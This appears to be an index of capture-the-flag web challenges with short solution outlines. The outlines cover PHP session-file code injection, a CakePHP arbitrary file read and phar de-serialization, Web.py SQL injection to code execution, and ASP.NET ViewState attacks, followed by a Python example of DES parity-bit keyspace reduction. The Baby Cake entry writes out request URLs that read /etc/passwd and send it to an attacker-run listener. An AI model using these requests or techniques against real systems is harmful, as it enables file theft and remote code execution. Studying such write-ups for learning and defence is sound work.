- One Line PHP Challenge
- Difficulty: ★★★★☆
- Solved: 3 / 1816
- Tag: PHP
- Source Code
- index.php
- Solution
- P.S. This is a default installation of PHP 7.2 + Apache on Ubuntu 18.04
- Control part of the session file content via PHP_SESSION_UPLOAD_PROGRESS
- Bypass session.upload_progress.cleanup = On with a race condition or a slow query
- Control the prefix to @<?php by chaining PHP wrappers
- exp_for_php.py
- Write Ups
- TBD
- Baby Cake
- Difficulty: ★★★
- Solved: 4 / 1816
- Tag: Code Review, PHP, De-serialization
- Source Code
- index.php
- Solution
- Because of how CURLOPT_SAFE_UPLOAD is implemented in CakePHP's FormData.php, we can read arbitrary files!
- # arbitrary file read, listen port 12345 on your server
- http://13.230.134.135/
- ?url=http://your_ip:12345/
- &data[x]=@/etc/passwd
- # arbitrary de-serialization via the Monolog POP chain
- http://13.230.134.135/
- ?url=http://your_ip:12345/
- &data[x]=@phar://../tmp/cache/mycache/[your_ip]/[md5_of_url]/body.cache
- exploit.phar
- Write Ups
- TBD
- Oh My Raddit
- Difficulty: ★7★
- Solved: 2 / 1816
- Tag: Observation, DES checksum, Crypto, Web
- Source Code
- app
- Solution
- Identify ECB mode from block frequency analysis
- Infer block size = 8 from the ciphertext length
- From the information above, DES is a reasonable guess for a cipher used in the real world
- The most common block is 3ca92540eb2d0a42 (always at the end of the ciphertext). We can guess it is the padding \x08\x08\x08\x08\x08\x08\x08\x08
- Because of the parity bits in DES keys, we can reduce the keyspace from 26 (abcdefghijklmnopqrstuvwxyz) to 14 (acegikmoqsuwyz)
- Break in 1 second with HashCat
- Break in 10 minutes with single thread Python
- Write Ups
- TBD
- Oh My Raddit v2
- Difficulty: ★★
- Solved: 10 / 1816
- Tag: Web.py, SQL Injection to RCE
- Source Code
- app
- Solution
- Read the package version from requirements.txt
- Remote Code Execution in Web.py framework
- exp.py
- Write Ups
- TBD
- Why so Serials?
- Difficulty: ★★★★
- Solved: 1 / 1816
- Tag: De-serialization, RCE, ASP.NET, View State
- Source Code
- index.php
- Solution
- Read the machineKey from web.config via Server-Side Includes (.shtml or .stm)
- Exploit ASP.NET __VIEWSTATE with ysoserial.net
- Write Ups
- TBD
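
The parity-bit step in the Oh My Raddit solution, worked through as an added Python example (not part of the original write-up; all function names are hypothetical). It shows why an 8-character lowercase DES key carries far less entropy than it appears to: DES discards the least significant bit of every key byte, so letters that differ only in that bit are the same key material.

```python
import math
import string


def effective_key(key: bytes) -> bytes:
    """Return the key bytes with the parity bit (LSB) cleared, as DES sees them."""
    if len(key) != 8:
        raise ValueError("DES keys are exactly 8 bytes")
    return bytes(b & 0xFE for b in key)


def equivalence_classes(alphabet: str) -> list:
    """Group alphabet characters that DES cannot tell apart in a key byte."""
    classes = {}
    for ch in sorted(set(alphabet)):
        classes.setdefault(ord(ch) & 0xFE, []).append(ch)
    return ["".join(group) for _, group in sorted(classes.items())]


def representatives(alphabet: str) -> str:
    """One character per class (the highest), covering every distinct key byte."""
    return "".join(group[-1] for group in equivalence_classes(alphabet))


def keyspace_report(alphabet: str, length: int = 8) -> dict:
    """Compare the apparent keyspace with the one DES actually distinguishes."""
    nominal = len(set(alphabet)) ** length
    effective = len(equivalence_classes(alphabet)) ** length
    return {
        "nominal_keys": nominal,
        "effective_keys": effective,
        "nominal_bits": round(math.log2(nominal), 1),
        "effective_bits": round(math.log2(effective), 1),
    }


if __name__ == "__main__":
    lower = string.ascii_lowercase
    print(equivalence_classes(lower))   # 'a' and 'z' stand alone, the rest pair up
    print(representatives(lower))
    print(keyspace_report(lower))
    # Constructed sample keys: different strings, identical DES key material.
    print(effective_key(b"bdfhjlnp") == effective_key(b"cegikmoq"))
```

The same report applies to any password-derived DES key: a restricted alphabet shrinks further once parity bits are stripped, which is one more reason to derive keys with a KDF and move off DES.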